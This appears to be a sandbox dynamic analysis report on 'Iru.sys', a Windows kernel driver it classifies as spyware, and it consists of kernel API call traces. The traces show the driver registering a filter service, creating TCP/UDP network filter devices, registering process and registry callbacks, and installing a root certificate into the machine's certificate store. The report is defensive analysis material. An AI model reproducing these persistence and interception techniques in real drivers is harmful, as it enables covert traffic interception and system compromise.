Malicious
Classifications
Spyware
Threat Names
Mal/Generic-S
Dynamic Analysis Report
Created on 2022-04-10T07:51:00
Iru.sys
Windows Driver (x86-64)
Remarks (2/2)
(0x0200000E): The overall sleep time of all monitored processes was truncated from "2 minutes, 58 seconds" to "178.0 milliseconds" to reveal dormant functionality.
(0x0200000D): In the case of standalone driver analysis, the Verdict does not take into account kernel mode function calls.
Kernel Graph 1
Code Block #1 (EP #2)
»
| Information | Value |
|---|---|
| Trigger | IopLoadDriver+0x51c |
| Start Address | 0xfffff800fc7e9369 |
Execution Path #2 (length: 137, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 137 |
Processes
»
| Process | Count |
|---|---|
| Process 2 (System, PID: 4) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x160, ret_val_ptr_out = 0xffffe0003c634010 |
| NtQuerySystemInformation | SystemInformationClass_unk = 0xb, Length_ptr = 0x0, SystemInformation_ptr_out = 0xffffd0002d296f70, ResultLength_ptr_out = 0xffffd0002d296f68, ResultLength_out = 0xffffd00000009f98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x13f30, ret_val_ptr_out = 0xffffe0003c8ca000 |
| NtQuerySystemInformation | SystemInformationClass_unk = 0xb, Length_ptr = 0x13f30, SystemInformation_ptr_out = 0xffffe0003c8ca000, ResultLength_ptr_out = 0xffffd0002d296f68, ResultLength_out = 0xffffd00000009f98, ret_val_out = 0x0 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003c8ca000, Tag = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2b0000, Length = 0x41dbfd, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003ba4a000 |
| MmProbeAndLockPages | MemoryDescriptorList_unk = 0xffffe0003ba4a000, AccessMode_unk = 0x0, Operation_unk = 0x1, MemoryDescriptorList_unk_out = 0xffffe0003ba4a000 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003ba4a000, AccessMode_unk = 0x0, CacheType_unk = 0x1, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x4d004500000020, ret_val_ptr_out = 0xffffdff441600000 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x3e6c, ret_val_ptr_out = 0xffffe0003c8ca000 |
| NtQuerySystemInformation | SystemInformationClass_unk = 0xb, Length_ptr = 0x0, SystemInformation_ptr_out = 0xffffd0002d296f70, ResultLength_ptr_out = 0xffffd0002d296f68, ResultLength_out = 0x9f98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x13f30, ret_val_ptr_out = 0xffffe0003af78000 |
| NtQuerySystemInformation | SystemInformationClass_unk = 0xb, Length_ptr = 0x13f30, SystemInformation_ptr_out = 0xffffe0003af78000, ResultLength_ptr_out = 0xffffd0002d296f68, ResultLength_out = 0x9f98, ret_val_out = 0x0 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af78000, Tag = 0x0 |
| NtQuerySystemInformation | SystemInformationClass_unk = 0xb, Length_ptr = 0x0, SystemInformation_ptr_out = 0xffffd0002d296f70, ResultLength_ptr_out = 0xffffd0002d296f68, ResultLength_out = 0xfffff80000009f98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x13f30, ret_val_ptr_out = 0xffffe0003af78000 |
| NtQuerySystemInformation | SystemInformationClass_unk = 0xb, Length_ptr = 0x13f30, SystemInformation_ptr_out = 0xffffe0003af78000, ResultLength_ptr_out = 0xffffd0002d296f68, ResultLength_out = 0xfffff80000009f98, ret_val_out = 0x0 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af78000, Tag = 0x0 |
| NtQuerySystemInformation | SystemInformationClass_unk = 0xb, Length_ptr = 0x0, SystemInformation_ptr_out = 0xffffd0002d296f70, ResultLength_ptr_out = 0xffffd0002d296f68, ResultLength_out = 0xfffff80000009f98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x13f30, ret_val_ptr_out = 0xffffe0003af78000 |
| NtQuerySystemInformation | SystemInformationClass_unk = 0xb, Length_ptr = 0x13f30, SystemInformation_ptr_out = 0xffffe0003af78000, ResultLength_ptr_out = 0xffffd0002d296f68, ResultLength_out = 0xfffff80000009f98, ret_val_out = 0x0 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af78000, Tag = 0x0 |
| KeSetSystemAffinityThread | Affinity_unk = 0x1 |
| KeRevertToUserAffinityThread | - |
| MmUnlockPages | MemoryDescriptorList_unk = 0xffffe0003ba4a000, MemoryDescriptorList_unk_out = 0xffffe0003ba4a000 |
| IoFreeMdl | Mdl_unk = 0xffffe0003ba4a000 |
| RtlInitUnicodeString | SourceString = mcd.sys, DestinationString_out = mcd.sys |
| RtlInitUnicodeString | SourceString = mcd.sys, DestinationString_out = mcd.sys |
| ExAllocatePool | PoolType_unk = 0x1, NumberOfBytes_ptr = 0x98, ret_val_ptr_out = 0xffffc000b9db2560 |
| RtlGetVersion | lpVersionInformation_ptr_out = 0xffffd0002d297000, lpVersionInformation_deref_dwOSVersionInfoSize_out = 0x11c, lpVersionInformation_deref_dwMajorVersion_out = 0xa, lpVersionInformation_deref_dwMinorVersion_out = 0x0, lpVersionInformation_deref_dwBuildNumber_out = 0x295a, lpVersionInformation_deref_dwPlatformId_out = 0x2, lpVersionInformation_deref_szCSDVersion_out = , ret_val_out = 0x0 |
| ZwOpenKey | DesiredAccess_unk = 0x20019, ObjectAttributes_ptr = 0xffffd0002d296f80, ObjectAttributes_deref_Length = 0x30, ObjectAttributes_deref_RootDirectory_unk = 0x0, ObjectAttributes_deref_ObjectName = \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion, ObjectAttributes_deref_Attributes = 0x240, ObjectAttributes_deref_SecurityDescriptor_ptr = 0x0, ObjectAttributes_deref_SecurityQualityOfService_ptr = 0x0, KeyHandle_ptr_out = 0xffffd0002d296fd8, KeyHandle_out = 0xffffffff80000a88, ret_val_out = 0x0 |
| ExAllocatePoolWithTag | PoolType_unk = 0x1, NumberOfBytes_ptr = 0x1000, Tag = 0x454e4f42, ret_val_ptr_out = 0xffffc000ba41a000 |
| ZwQueryValueKey | KeyHandle_unk = 0xffffffff80000a88, ValueName = BuildLabEx, KeyValueInformationClass_unk = 0x1, Length = 0x1000, KeyValueInformation_ptr_out = 0xffffc000ba41a000, KeyValueInformation_deref_TitleIndex_out = 0x0, KeyValueInformation_deref_Type_out = 0x1, KeyValueInformation_deref_DataOffset_out = 0x28, KeyValueInformation_deref_DataLength_out = 0x52, KeyValueInformation_deref_NameLength_out = 0x14, KeyValueInformation_deref_Name_out = BuildLabEx, KeyValueInformation_deref_Data_out = 10586.0.amd64fre.th2_release.151029-1700, ResultLength_ptr_out = 0xffffd0002d296fd0, ret_val_out = 0x0 |
| RtlUnicodeStringToInteger | String = 0., Base = 0xa, Value_ptr_out = 0xffffd0002d297130, ret_val_out = 0x0 |
| ExFreePoolWithTag | P_ptr = 0xffffc000ba41a000, Tag = 0x454e4f42 |
| ZwClose | Handle_unk = 0xffffffff80000a88, ret_val_out = 0x0 |
| MmGetSystemRoutineAddress | SystemRoutineName = NtOpenFile, ret_val_ptr_out = 0xfffff80041a96348 |
| ZwQuerySystemInformation | SystemInformationClass_unk = 0xb, Length_ptr = 0x0, SystemInformation_ptr_out = 0x0, ResultLength_ptr_out = 0xffffd0002d296f68, ret_val_out = 0xc0000004 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x9f98, Tag = 0x454e4f42, ret_val_ptr_out = 0xffffe0003af78000 |
| ZwQuerySystemInformation | SystemInformationClass_unk = 0xb, Length_ptr = 0x9f98, SystemInformation_ptr_out = 0xffffe0003af78000, ResultLength_ptr_out = 0xffffd0002d296f68, ret_val_out = 0x0 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af78000, Tag = 0x454e4f42 |
| RtlImageNtHeader | BaseAddress_ptr = 0xfffff80041684000, ret_val_unk_out = 0xfffff80041684108 |
| RtlInitAnsiString | SourceString = PAGE, DestinationString_out = PAGE |
| RtlInitAnsiString | SourceString = .text, DestinationString_out = .text |
| RtlCompareString | String1 = PAGE, String2 = .text, CaseInSensitive = 1, ret_val_out = 34 |
| RtlInitAnsiString | SourceString = PAGE, DestinationString_out = PAGE |
| RtlInitAnsiString | SourceString = ERRATA, DestinationString_out = ERRATA |
| RtlCompareString | String1 = PAGE, String2 = ERRATA, CaseInSensitive = 1, ret_val_out = 11 |
| RtlInitAnsiString | SourceString = PAGE, DestinationString_out = PAGE |
| RtlInitAnsiString | SourceString = INITKDBGMþ, DestinationString_out = INITKDBGMþ |
| RtlCompareString | String1 = PAGE, String2 = INITKDBGMþ, CaseInSensitive = 1, ret_val_out = 7 |
| RtlInitAnsiString | SourceString = PAGE, DestinationString_out = PAGE |
| RtlInitAnsiString | SourceString = POOLCODE ', DestinationString_out = POOLCODE ' |
| RtlCompareString | String1 = PAGE, String2 = POOLCODE ', CaseInSensitive = 1, ret_val_out = -14 |
| RtlInitAnsiString | SourceString = PAGE, DestinationString_out = PAGE |
| RtlInitAnsiString | SourceString = .rdata, DestinationString_out = .rdata |
| RtlCompareString | String1 = PAGE, String2 = .rdata, CaseInSensitive = 1, ret_val_out = 34 |
| RtlInitAnsiString | SourceString = PAGE, DestinationString_out = PAGE |
| RtlInitAnsiString | SourceString = .data, DestinationString_out = .data |
| RtlCompareString | String1 = PAGE, String2 = .data, CaseInSensitive = 1, ret_val_out = 34 |
| RtlInitAnsiString | SourceString = PAGE, DestinationString_out = PAGE |
| RtlInitAnsiString | SourceString = .pdata, DestinationString_out = .pdata |
| RtlCompareString | String1 = PAGE, String2 = .pdata, CaseInSensitive = 1, ret_val_out = 34 |
| RtlInitAnsiString | SourceString = PAGE, DestinationString_out = PAGE |
| RtlInitAnsiString | SourceString = ALMOSTROP1, DestinationString_out = ALMOSTROP1 |
| RtlCompareString | String1 = PAGE, String2 = ALMOSTROP1, CaseInSensitive = 1, ret_val_out = 15 |
| RtlInitAnsiString | SourceString = PAGE, DestinationString_out = PAGE |
| RtlInitAnsiString | SourceString = CACHEALI, DestinationString_out = CACHEALI |
| RtlCompareString | String1 = PAGE, String2 = CACHEALI, CaseInSensitive = 1, ret_val_out = 13 |
| RtlInitAnsiString | SourceString = PAGE, DestinationString_out = PAGE |
| RtlInitAnsiString | SourceString = PAGELK, DestinationString_out = PAGELK |
| RtlCompareString | String1 = PAGE, String2 = PAGELK, CaseInSensitive = 1, ret_val_out = -2 |
| RtlInitAnsiString | SourceString = PAGE, DestinationString_out = PAGE |
| RtlInitAnsiString | SourceString = PAGE, DestinationString_out = PAGE |
| RtlCompareString | String1 = PAGE, String2 = PAGE, CaseInSensitive = 1, ret_val_out = 0 |
| RtlGetVersion | lpVersionInformation_ptr_out = 0xfffff800fc55b1a0, lpVersionInformation_deref_dwOSVersionInfoSize_out = 0x0, lpVersionInformation_deref_dwMajorVersion_out = 0xa, lpVersionInformation_deref_dwMinorVersion_out = 0x0, lpVersionInformation_deref_dwBuildNumber_out = 0x295a, lpVersionInformation_deref_dwPlatformId_out = 0x2, lpVersionInformation_deref_szCSDVersion_out = , ret_val_out = 0x0 |
| ZwCreateKey | DesiredAccess_unk = 0xf003f, ObjectAttributes_ptr = 0xffffd0002d2970f0, ObjectAttributes_deref_Length = 0x30, ObjectAttributes_deref_RootDirectory_unk = 0x0, ObjectAttributes_deref_ObjectName = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\4UonVc8lOEt4AL4JQLxQ8QpV1vO, ObjectAttributes_deref_Attributes = 0x40, ObjectAttributes_deref_SecurityDescriptor_ptr = 0x0, ObjectAttributes_deref_SecurityQualityOfService_ptr = 0x0, TitleIndex = 0x0, Class_ptr = 0x0, CreateOptions = 0x0, KeyHandle_ptr_out = 0xffffd0002d297140, KeyHandle_out = 0xffffffff80000a88, Disposition_ptr_out = 0xffffd0002d297138, Disposition_out = 0x2, ret_val_out = 0x0 |
| ZwClose | Handle_unk = 0xffffffff80000a88, ret_val_out = 0x0 |
| RtlInitUnicodeString | SourceString = DependOnService, DestinationString_out = DependOnService |
| RtlInitUnicodeString | SourceString = Group, DestinationString_out = Group |
| RtlInitUnicodeString | SourceString = Start, DestinationString_out = Start |
| ZwOpenKey | DesiredAccess_unk = 0xf003f, ObjectAttributes_ptr = 0xffffd0002d2970f0, ObjectAttributes_deref_Length = 0x30, ObjectAttributes_deref_RootDirectory_unk = 0x0, ObjectAttributes_deref_ObjectName = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\4UonVc8lOEt4AL4JQLxQ8QpV1vO, ObjectAttributes_deref_Attributes = 0x40, ObjectAttributes_deref_SecurityDescriptor_ptr = 0x0, ObjectAttributes_deref_SecurityQualityOfService_ptr = 0x0, KeyHandle_ptr_out = 0xffffd0002d297140, KeyHandle_out = 0xffffffff80000a88, ret_val_out = 0x0 |
| ZwSetValueKey | KeyHandle_unk = 0xffffffff80000a88, ValueName = DependOnService, TitleIndex = 0x0, Type = 0x1, Data = FltMgr, DataSize = 0x10, ret_val_out = 0x0 |
| ZwSetValueKey | KeyHandle_unk = 0xffffffff80000a88, ValueName = Group, TitleIndex = 0x0, Type = 0x1, Data = System Reserved, DataSize = 0x22, ret_val_out = 0x0 |
| ZwSetValueKey | KeyHandle_unk = 0xffffffff80000a88, ValueName = Start, TitleIndex = 0x0, Type = 0x4, Data_ptr = 0xffffd0002d297130, Data = 0x0, DataSize = 0x4, ret_val_out = 0x0 |
| ZwClose | Handle_unk = 0xffffffff80000a88, ret_val_out = 0x0 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x800, ret_val_ptr_out = 0xffffe0003c634800 |
| RtlInitUnicodeString | SourceString = \, DestinationString_out = \ |
| RtlInitUnicodeString | SourceString = Instances, DestinationString_out = Instances |
| ZwCreateKey | DesiredAccess_unk = 0xf003f, ObjectAttributes_ptr = 0xffffd0002d296f10, ObjectAttributes_deref_Length = 0x30, ObjectAttributes_deref_RootDirectory_unk = 0x0, ObjectAttributes_deref_ObjectName = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\4UonVc8lOEt4AL4JQLxQ8QpV1vO\Instances, ObjectAttributes_deref_Attributes = 0x40, ObjectAttributes_deref_SecurityDescriptor_ptr = 0x0, ObjectAttributes_deref_SecurityQualityOfService_ptr = 0x0, TitleIndex = 0x0, Class_ptr = 0x0, CreateOptions = 0x0, KeyHandle_ptr_out = 0xffffd0002d297170, KeyHandle_out = 0xffffffff80000a88, Disposition_ptr_out = 0xffffd0002d297160, Disposition_out = 0x1, ret_val_out = 0x0 |
| RtlInitUnicodeString | SourceString = DefaultInstance, DestinationString_out = DefaultInstance |
| ZwSetValueKey | KeyHandle_unk = 0xffffffff80000a88, ValueName = DefaultInstance, TitleIndex = 0x0, Type = 0x1, Data = 4UonVc8lOEt4AL4JQLxQ8QpV1vO Instance, DataSize = 0x4a, ret_val_out = 0x0 |
| ZwClose | Handle_unk = 0xffffffff80000a88, ret_val_out = 0x0 |
| RtlInitUnicodeString | SourceString = \, DestinationString_out = \ |
| RtlInitUnicodeString | SourceString = 4UonVc8lOEt4AL4JQLxQ8QpV1vO Instance, DestinationString_out = 4UonVc8lOEt4AL4JQLxQ8QpV1vO Instance |
| ZwCreateKey | DesiredAccess_unk = 0xf003f, ObjectAttributes_ptr = 0xffffd0002d296f10, ObjectAttributes_deref_Length = 0x30, ObjectAttributes_deref_RootDirectory_unk = 0x0, ObjectAttributes_deref_ObjectName = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\4UonVc8lOEt4AL4JQLxQ8QpV1vO\Instances\4UonVc8lOEt4AL4JQLxQ8QpV1vO Instance, ObjectAttributes_deref_Attributes = 0x40, ObjectAttributes_deref_SecurityDescriptor_ptr = 0x0, ObjectAttributes_deref_SecurityQualityOfService_ptr = 0x0, TitleIndex = 0x0, Class_ptr = 0x0, CreateOptions = 0x0, KeyHandle_ptr_out = 0xffffd0002d297170, KeyHandle_out = 0xffffffff80000a88, Disposition_ptr_out = 0xffffd0002d297160, Disposition_out = 0x1, ret_val_out = 0x0 |
| RtlInitUnicodeString | SourceString = Altitude, DestinationString_out = Altitude |
| RtlInitUnicodeString | SourceString = 399996, DestinationString_out = 399996 |
| ZwSetValueKey | KeyHandle_unk = 0xffffffff80000a88, ValueName = Altitude, TitleIndex = 0x0, Type = 0x1, Data = 399996, DataSize = 0xe, ret_val_out = 0x0 |
| RtlInitUnicodeString | SourceString = Flags, DestinationString_out = Flags |
| ZwSetValueKey | KeyHandle_unk = 0xffffffff80000a88, ValueName = Flags, TitleIndex = 0x0, Type = 0x4, Data_ptr = 0xffffd0002d297168, Data = 0x0, DataSize = 0x4, ret_val_out = 0x0 |
| ZwClose | Handle_unk = 0xffffffff80000a88, ret_val_out = 0x0 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634800, Tag = 0x0 |
| PsCreateSystemThread | DesiredAccess = 0x1fffff, ObjectAttributes_unk = 0xffffd0002d2971a0, ProcessHandle_unk = 0x0, StartRoutine_unk = 0xfffff800fc2cbcb0, StartContext_ptr = 0x0, ThreadHandle_ptr_out = 0xffffd0002d2971e0, ThreadHandle_out = 0xffffffff80000a88, ClientId_unk_out = 0x0, ret_val_out = 0x0 |
| ZwClose | Handle_unk = 0xffffffff80000a88, ret_val_out = 0x0 |
| RtlAppendUnicodeToString | Source = \Device\Tcp1Flt, Destination_out = \Device\Tcp1Flt, ret_val_out = 0x0 |
| RtlAppendUnicodeToString | Destination = \Device\Tcp1Flt, Source = netfilter2, Destination_out = \Device\Tcp1Fltnetfilter2, ret_val_out = 0x0 |
| RtlAppendUnicodeToString | Source = \Device\Tcp61Flt, Destination_out = \Device\Tcp61Flt, ret_val_out = 0x0 |
| RtlAppendUnicodeToString | Destination = \Device\Tcp61Flt, Source = netfilter2, Destination_out = \Device\Tcp61Fltnetfilter2, ret_val_out = 0x0 |
| RtlAppendUnicodeToString | Source = \Device\Udp1Flt, Destination_out = \Device\Udp1Flt, ret_val_out = 0x0 |
| RtlAppendUnicodeToString | Destination = \Device\Udp1Flt, Source = netfilter2, Destination_out = \Device\Udp1Fltnetfilter2, ret_val_out = 0x0 |
| RtlAppendUnicodeToString | Source = \Device\Udp61Flt, Destination_out = \Device\Udp61Flt, ret_val_out = 0x0 |
| RtlAppendUnicodeToString | Destination = \Device\Udp61Flt, Source = netfilter2, Destination_out = \Device\Udp61Fltnetfilter2, ret_val_out = 0x0 |
| RtlAppendUnicodeToString | Source = \Device\Ctrl, Destination_out = \Device\Ctrl, ret_val_out = 0x0 |
| RtlAppendUnicodeToString | Destination = \Device\Ctrl, Source = SM, Destination_out = \Device\CtrlSM, ret_val_out = 0x0 |
| RtlAppendUnicodeToString | Destination = \Device\CtrlSM, Source = netfilter2, Destination_out = \Device\CtrlSMnetfilter2, ret_val_out = 0x0 |
| RtlAppendUnicodeToString | Source = \DosDevices\Ctrl, Destination_out = \DosDevices\Ctrl, ret_val_out = 0x0 |
| RtlAppendUnicodeToString | Destination = \DosDevices\Ctrl, Source = SM, Destination_out = \DosDevices\CtrlSM, ret_val_out = 0x0 |
| RtlAppendUnicodeToString | Destination = \DosDevices\CtrlSM, Source = netfilter2, Destination_out = \DosDevices\CtrlSMnetfilter2, ret_val_out = 0x0 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x5e60, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003af78000 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x5e60, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003af7e000 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x5e60, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003af84000 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x5e60, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003af8a000 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x5e60, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003af90000 |
| KeInitializeDpc | DeferredRoutine_unk = 0xfffff800fc2b6db0, DeferredContext_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c170 |
| KeInitializeTimer | Timer_unk_out = 0xfffff800fc55c130 |
| KeInitializeDpc | DeferredRoutine_unk = 0xfffff800fc2c46a0, DeferredContext_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c1f8 |
| KeInitializeDpc | DeferredRoutine_unk = 0xfffff800fc2b21a0, DeferredContext_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c250 |
| KeInitializeDpc | DeferredRoutine_unk = 0xfffff800fc2b6e90, DeferredContext_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290 |
| IoCreateDevice | DriverObject_unk = 0xffffe0003cbe3e60, DeviceExtensionSize = 0x0, DeviceName = \Device\CtrlSMnetfilter2, DeviceType_unk = 0x22, DeviceCharacteristics = 0x100, Exclusive = 0, DeviceObject_unk_out = 0xfffff800fc55c080, ret_val_out = 0x0 |
| IoCreateSymbolicLink | SymbolicLinkName = \DosDevices\CtrlSMnetfilter2, DeviceName = \Device\CtrlSMnetfilter2, ret_val_out = 0x0 |
| PsCreateSystemThread | DesiredAccess = 0x1fffff, ObjectAttributes_unk = 0xffffd0002d297120, ProcessHandle_unk = 0x0, StartRoutine_unk = 0xfffff800fc2ba140, StartContext_ptr = 0xffffe0003cbe3e60, ThreadHandle_ptr_out = 0xffffd0002d297168, ThreadHandle_out = 0xffffffff80000a88, ClientId_unk_out = 0x0, ret_val_out = 0x0 |
| ZwClose | Handle_unk = 0xffffffff80000a88, ret_val_out = 0x0 |
| PsCreateSystemThread | DesiredAccess = 0x1fffff, ObjectAttributes_unk = 0xffffd0002d297120, ProcessHandle_unk = 0x0, StartRoutine_unk = 0xfffff800fc2cb1c0, StartContext_ptr = 0x0, ThreadHandle_ptr_out = 0xffffd0002d297160, ThreadHandle_out = 0xffffffff80000a88, ClientId_unk_out = 0x0, ret_val_out = 0x0 |
| ZwClose | Handle_unk = 0xffffffff80000a88, ret_val_out = 0x0 |
| PsSetCreateProcessNotifyRoutine | NotifyRoutine_unk = 0xfffff800fc2caa50, Remove = 0, ret_val_out = 0x0 |
| PsSetCreateProcessNotifyRoutine | NotifyRoutine_unk = 0xfffff800fc2caa40, Remove = 0, ret_val_out = 0x0 |
| IoRegisterShutdownNotification | DeviceObject_unk = 0xffffe0003bb063b0, ret_val_out = 0x0 |
Code Block #5 (EP #175)
»
| Information | Value |
|---|---|
| Trigger | PspSystemThreadStartup+0x3f |
| Start Address | 0xfffff800fc2cbcb0 |
Execution Path #175 (length: 9, count: 1, processes: 1 incomplete)
»
| Information | Value |
|---|---|
| Sequence Length | 9 |
Processes
»
| Process | Count |
|---|---|
| Process 2 (System, PID: 4) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c21f350 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c21f350, MemoryDescriptorList_unk_out = 0xffffe0003c21f350 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c21f350, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd00037d3d560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd00037d3d560, MemoryDescriptorList_unk = 0xffffe0003c21f350 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c21f350 |
| CmRegisterCallback | Function_unk = 0xfffff800fc2cb560, Context_ptr = 0x0, Cookie_ptr_out = 0xfffff800fc55b358, ret_val_out = 0x0 |
| PsCreateSystemThread | DesiredAccess = 0x1fffff, ObjectAttributes_unk = 0xffffd0002e35e480, ProcessHandle_unk = 0x0, StartRoutine_unk = 0xfffff800fc2cbbc0, StartContext_ptr = 0x0, ThreadHandle_ptr_out = 0xffffd0002e35e4d8, ThreadHandle_out = 0xffffffff80000c04, ClientId_unk_out = 0x0, ret_val_out = 0x0 |
| ZwClose | Handle_unk = 0xffffffff80000c04, ret_val_out = 0x0 |
| PsTerminateSystemThread | ExitStatus = 0x0 |
Code Block #6 (EP #176)
»
| Information | Value |
|---|---|
| Trigger | PspSystemThreadStartup+0x3f |
| Start Address | 0xfffff800fc2ba140 |
Execution Path #176 (length: 1156, count: 1, processes: 1 incomplete)
»
| Information | Value |
|---|---|
| Sequence Length | 1156 |
Processes
»
| Process | Count |
|---|---|
| Process 2 (System, PID: 4) | 1 |
Sequence
»
| Symbol | Parameters | ||||
|---|---|---|---|---|---|
| ZwQuerySystemInformation | SystemInformationClass_unk = 0x5, Length_ptr = 0x0, SystemInformation_ptr_out = 0x0, ResultLength_ptr_out = 0xffffd00033d29490, ret_val_out = 0xc0000004 | ||||
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x1fb18, Tag = 0x454e4f42, ret_val_ptr_out = 0xffffe0003a764000 | ||||
| ZwQuerySystemInformation | SystemInformationClass_unk = 0x5, Length_ptr = 0x1fb18, SystemInformation_ptr_out = 0xffffe0003a764000, ResultLength_ptr_out = 0xffffd00033d29490, ret_val_out = 0x0 | ||||
| PsLookupProcessByProcessId | ProcessId_unk = 0x0, Process_unk_out = 0xffffd00033d29498, ret_val_out = 0xc000000b | ||||
| PsLookupProcessByProcessId | ProcessId_unk = 0x4, Process_unk_out = 0xffffd00033d29498, ret_val_out = 0x0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _strnicmp | _Str1 = System, _Str = smss.exe, _MaxCount_ptr = 0x8, ret_val_out = 12 | ||||
| PsLookupProcessByProcessId | ProcessId_unk = 0x12c, Process_unk_out = 0xffffd00033d29498, ret_val_out = 0x0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003af4f490 | ||||
| _strnicmp | _Str1 = smss.exe, _Str = smss.exe, _MaxCount_ptr = 0x8, ret_val_out = 0 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a764000, Tag = 0x454e4f42 | ||||
| ZwOpenKey | DesiredAccess_unk = 0x2001f, ObjectAttributes_ptr = 0xffffd00033d29440, ObjectAttributes_deref_Length = 0x30, ObjectAttributes_deref_RootDirectory_unk = 0x0, ObjectAttributes_deref_ObjectName = \Registry\Machine\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates, ObjectAttributes_deref_Attributes = 0x240, ObjectAttributes_deref_SecurityDescriptor_ptr = 0x0, ObjectAttributes_deref_SecurityQualityOfService_ptr = 0x0, KeyHandle_ptr_out = 0xffffd00033d29480, KeyHandle_out = 0xffffffff80000c04, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| ZwSetValueKey | KeyHandle_unk = 0xffffffff80000c04, ValueName = 87AAF9C345942AD56C43CA9DF7AC6D3E67D13B82, TitleIndex = 0x0, Type = 0x3, Data_ptr = 0xfffff800fc559d10, Data_deref_data = BINARY(offset=1998399,skipped=0,size=850), DataSize = 0x352, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba05f4c0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba05f4c0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00033d28f68, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xa6, ret_val_ptr_out = 0xffffe0003af7df50 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba05f4c0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba05f4c0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00033d28c48, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xa4, ret_val_ptr_out = 0xffffe0003af7de90 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba05f4c0, Length = 0xa4, ObjectNameInfo_unk_out = 0xffffe0003af7de90, ReturnLength_ptr_out = 0xffffd00033d28c48, ret_val_out = 0x0 | ||||
